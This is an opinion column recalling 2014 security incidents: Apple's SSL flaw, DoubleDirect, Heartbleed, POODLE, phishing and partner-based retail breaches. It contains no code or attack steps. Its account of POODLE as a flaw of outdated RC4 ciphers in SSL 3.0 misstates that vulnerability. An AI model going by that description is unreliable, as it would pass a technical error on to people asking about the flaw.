2014: the year that security broke
Davey Winder takes a look back at how insecure we all were in 2014...
OPINION: Let me be very clear about this from the get go: 2014 has been a disastrous year for IT security. Ironically, while the Edward Snowden revelations the year before were bad enough, at least they led to a sea change in the way that businesses and the public alike viewed the privacy of their data. They also prompted big technology players like Apple and Google to do something about it by bringing device encryption to the fore. This latter development was the only real positive I can pluck from the insecure mess that was 2014.
So, let's start with Apple. OSX and iOS users got caught out by man-in-the-middle attacks, twice. Back at the start of the year it was discovered that the Apple implementation of SSL was vulnerable to man-in-the-middle attacks, leaving users potentially at risk of sensitive transactional data theft even though they assumed their connections were secure. That flaw got patched, but then in November news emerged of the DoubleDirect threat which used ICMP redirects to change the routing tables on the victim host and once again left iOS and OSX users at risk.
This time though, Android users were also implicated in the threat spectrum. Android is generally accepted as being more insecure than iOS (it's OK, I am wearing my tinfoil hat and hiding in a bunker so should escape relatively unscathed) so there was little surprise that it got caught in the insecurity tsunami of 2014.
If the year confirmed mobile as a threat vector on the up, it proved beyond any reasonable doubt was that SSL was not only badly named (a Secure Sockets Layer it was no longer) but pretty much dead in the water. First there was the OpenSSL Heartbleed shocker at the start of the year, and which come the end of it is still a cause for concern.
Then there was the revelation from the Google security folk about outdated RC4 ciphers being used in SSL 3.0 - the so-called POODLE vulnerability, which was just as much of a hammer blow. Why so? Well, according to Microsoft, more than 40 per cent of global websites were using these flawed ciphers. No surprise then that plenty of malware quickly found its way into the market in order to exploit this fact. That decades old flaws were one of the biggest threats to IT security in 2014 is enough to make us hang our collective heads in shame. That decades old threat techniques continued to be successful in system breaches equally so.
There's no denying that the bad guys, be they criminal enterprises or state sponsored teams, continue to become more sophisticated in terms of the malware code they use the simple fact is that they also continue to have great success with the oldest of confidence trick methodologies.
Call it social engineering, phishing, an advanced persistent threat, the semantics are irrelevant; scamming your way into the network remains the preferred route of entry for the cyber-crims. Individual, small business and right up to the largest enterprises have fallen victim to such techniques. Unfortunately, for many businesses, they also discovered the hard way that another route of entry to their data is through their business partners. Hey, why bother attacking what appears to be a secure enterprise when you can attack an insecure one that is trusted by them? It worked in many of the major retail breaches that were disclosed across the year.